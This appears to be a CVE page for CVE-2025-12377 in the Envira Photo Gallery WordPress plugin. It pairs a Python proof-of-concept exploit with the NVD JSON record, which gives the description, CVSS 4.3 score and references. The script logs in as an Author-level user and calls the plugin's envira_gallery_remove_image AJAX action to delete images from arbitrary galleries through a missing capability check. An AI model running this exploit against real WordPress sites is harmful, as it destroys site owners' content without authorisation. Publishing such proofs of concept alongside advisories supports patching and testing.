CVE-2025-12377

import requests import sys # CVE-2025-12377 PoC - Envira Photo Gallery Unauthorized Data Modification # Target: WordPress site with Envira Photo Gallery plugin <= 1.12.0 target_url = "http://target-wordpress-site.com" session = requests.Session() # Step 1: Authenticate with Author-level account login_url = f"{target_url}/wp-login.php" login_data = { "log": "author_username", "pwd": "author_password", "wp-submit": "Log In", "redirect_to": "/wp-admin/" } login_response = session.post(login_url, data=login_data) if "wordpress_logged_in" not in session.cookies.get_dict(): print("[-] Login failed") sys.exit(1) print("[+] Login successful") # Step 2: Exploit - Delete images from arbitrary gallery ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { "action": "envira_gallery_remove_image", "gallery_id": "1", # Target gallery ID "image_id": "100", # Image ID to delete "nonce": "attacker_provided_or_bypassed_nonce" } response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print("[+] Exploit sent - Check if image was deleted") print(f"[+] Response: {response.text}") else: print("[-] Exploit failed")

{"cve": {"id": "CVE-2025-12377", "sourceIdentifier": "[email protected]", "published": "2025-11-13T12:15:48.903", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gallery Plugin for WordPress – Envira Photo Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.12.0. This makes it possible for authenticated attackers, with Author-level access and above, to perform multiple actions, such as removing images from arbitrary galleries. The vulnerability was partially patched in version 1.12.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://drive.google.com/file/d/1AgsJeff1x4pQAFVGmoSwwU75iiH4-H_p/view?usp=sharing", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/envira-gallery-lite/trunk/includes/admin/ajax.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3387243/envira-gallery-lite/trunk/includes/admin/ajax.php?old=3133202&old_path=envira-gallery-lite%2Ftrunk%2Fincludes%2Fadmin%2Fajax.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394455%40envira-gallery-lite&old=3387243%40envira-gallery-lite&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-12377/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/69a0d985-cc85-45ba-889d-1ed30d06f9ce?source=cve", "source": "[email protected]"}]}}